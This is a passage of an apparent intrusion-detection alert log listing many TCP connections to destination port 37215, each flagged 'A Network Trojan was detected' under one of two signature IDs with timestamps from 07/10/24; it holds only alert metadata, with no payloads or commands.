                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.498408
                  SID:2829579
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327532
                  SID:2835222
                  Source Port:50290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.796223
                  SID:2829579
                  Source Port:60264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2835222
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.525372
                  SID:2835222
                  Source Port:40410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834726
                  SID:2829579
                  Source Port:51090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2829579
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2829579
                  Source Port:36248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.859718
                  SID:2829579
                  Source Port:40336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.858439
                  SID:2835222
                  Source Port:47624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156197
                  SID:2829579
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636367
                  SID:2829579
                  Source Port:37970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.829856
                  SID:2835222
                  Source Port:60172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810948
                  SID:2829579
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.437142
                  SID:2835222
                  Source Port:41128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527013
                  SID:2829579
                  Source Port:53360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2835222
                  Source Port:42016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2835222
                  Source Port:55700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2829579
                  Source Port:55836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.379433
                  SID:2835222
                  Source Port:35494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077198
                  SID:2835222
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.887861
                  SID:2829579
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2835222
                  Source Port:58134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2829579
                  Source Port:35396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.739677
                  SID:2835222
                  Source Port:55232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539050
                  SID:2829579
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.257724
                  SID:2829579
                  Source Port:33660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781765
                  SID:2835222
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2829579
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2829579
                  Source Port:33992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658896
                  SID:2835222
                  Source Port:34358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810872
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2829579
                  Source Port:60374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795312
                  SID:2829579
                  Source Port:51322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050509
                  SID:2829579
                  Source Port:34736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.949060
                  SID:2829579
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794685
                  SID:2835222
                  Source Port:33550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.862502
                  SID:2835222
                  Source Port:44592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.863038
                  SID:2829579
                  Source Port:47816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:44328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2835222
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2829579
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2835222
                  Source Port:33874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2829579
                  Source Port:58556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115626
                  SID:2835222
                  Source Port:46440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.161677
                  SID:2829579
                  Source Port:38670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2835222
                  Source Port:41960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631188
                  SID:2835222
                  Source Port:59912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.964611
                  SID:2835222
                  Source Port:42462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215093
                  SID:2829579
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2829579
                  Source Port:59516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322361
                  SID:2829579
                  Source Port:56486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.414478
                  SID:2835222
                  Source Port:48800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951763
                  SID:2829579
                  Source Port:57554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.203843
                  SID:2829579
                  Source Port:46158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.647957
                  SID:2835222
                  Source Port:60724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605187
                  SID:2829579
                  Source Port:43982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.768210
                  SID:2835222
                  Source Port:53612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.969390
                  SID:2829579
                  Source Port:34724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2829579
                  Source Port:56390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2829579
                  Source Port:40162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2829579
                  Source Port:47960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.335498
                  SID:2829579
                  Source Port:59964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944387
                  SID:2829579
                  Source Port:58706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.055079
                  SID:2829579
                  Source Port:38372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.000964
                  SID:2835222
                  Source Port:43120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.094714
                  SID:2829579
                  Source Port:50344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2835222
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.447886
                  SID:2835222
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853049
                  SID:2829579
                  Source Port:58298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2835222
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2829579
                  Source Port:37696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720199
                  SID:2835222
                  Source Port:34078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605259
                  SID:2829579
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603394
                  SID:2829579
                  Source Port:53212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2835222
                  Source Port:56746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2829579
                  Source Port:39098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854834
                  SID:2835222
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.535495
                  SID:2829579
                  Source Port:60516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2835222
                  Source Port:56330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.166919
                  SID:2835222
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2829579
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862104
                  SID:2835222
                  Source Port:47342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.990207
                  SID:2829579
                  Source Port:49058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.692447
                  SID:2835222
                  Source Port:50932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.623006
                  SID:2835222
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.804220
                  SID:2835222
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.581660
                  SID:2835222
                  Source Port:34368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.246495
                  SID:2835222
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2835222
                  Source Port:52156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2835222
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2829579
                  Source Port:52646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2829579
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.079207
                  SID:2835222
                  Source Port:46902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2829579
                  Source Port:52610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098099
                  SID:2829579
                  Source Port:54586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766765
                  SID:2835222
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2835222
                  Source Port:39802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2829579
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.927319
                  SID:2829579
                  Source Port:56534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.661675
                  SID:2829579
                  Source Port:46762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998710
                  SID:2835222
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2829579
                  Source Port:44352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2835222
                  Source Port:40816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540964
                  SID:2829579
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2829579
                  Source Port:37882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:39884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447163
                  SID:2835222
                  Source Port:44782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442575
                  SID:2829579
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2835222
                  Source Port:48222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512304
                  SID:2829579
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2835222
                  Source Port:51316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2835222
                  Source Port:39770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2829579
                  Source Port:51976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842184
                  SID:2829579
                  Source Port:46510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2829579
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.929780
                  SID:2829579
                  Source Port:58154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980923
                  SID:2829579
                  Source Port:36740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2835222
                  Source Port:59070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661983
                  SID:2829579
                  Source Port:46492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173091
                  SID:2835222
                  Source Port:40278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701757
                  SID:2835222
                  Source Port:56592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.307803
                  SID:2835222
                  Source Port:32868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:53070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.623300
                  SID:2829579
                  Source Port:47974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983078
                  SID:2829579
                  Source Port:35048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2829579
                  Source Port:35160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.565962
                  SID:2829579
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2829579
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2829579
                  Source Port:50058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2829579
                  Source Port:57362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.182611
                  SID:2829579
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.409560
                  SID:2829579
                  Source Port:51204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2835222
                  Source Port:57936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2835222
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.972895
                  SID:2835222
                  Source Port:42686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.226106
                  SID:2835222
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2835222
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027188
                  SID:2835222
                  Source Port:49700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.607824
                  SID:2829579
                  Source Port:39848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2829579
                  Source Port:60716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852181
                  SID:2829579
                  Source Port:43358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2835222
                  Source Port:47222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2835222
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985127
                  SID:2829579
                  Source Port:33742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2835222
                  Source Port:34374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2835222
                  Source Port:34352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281548
                  SID:2829579
                  Source Port:42318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.871507
                  SID:2835222
                  Source Port:50634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063157
                  SID:2829579
                  Source Port:43026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.228367
                  SID:2835222
                  Source Port:60116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.646157
                  SID:2835222
                  Source Port:60540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.611492
                  SID:2829579
                  Source Port:39272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.617546
                  SID:2835222
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538016
                  SID:2835222
                  Source Port:48870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611140
                  SID:2835222
                  Source Port:35314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.771022
                  SID:2835222
                  Source Port:59980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2835222
                  Source Port:34844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2829579
                  Source Port:60674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2829579
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.780155
                  SID:2835222
                  Source Port:57072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2829579
                  Source Port:48276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168478
                  SID:2829579
                  Source Port:43796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357812
                  SID:2829579
                  Source Port:41596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.793102
                  SID:2829579
                  Source Port:40560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2835222
                  Source Port:55868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.963171
                  SID:2835222
                  Source Port:49828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.929002
                  SID:2835222
                  Source Port:33356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2829579
                  Source Port:43312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.657674
                  SID:2829579
                  Source Port:59508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459797
                  SID:2829579
                  Source Port:42632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2835222
                  Source Port:35654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389653
                  SID:2829579
                  Source Port:60240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2829579
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932459
                  SID:2835222
                  Source Port:59214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647215
                  SID:2829579
                  Source Port:44306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2829579
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.310609
                  SID:2829579
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.079794
                  SID:2829579
                  Source Port:33468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.511633
                  SID:2835222
                  Source Port:59684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2835222
                  Source Port:38080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2835222
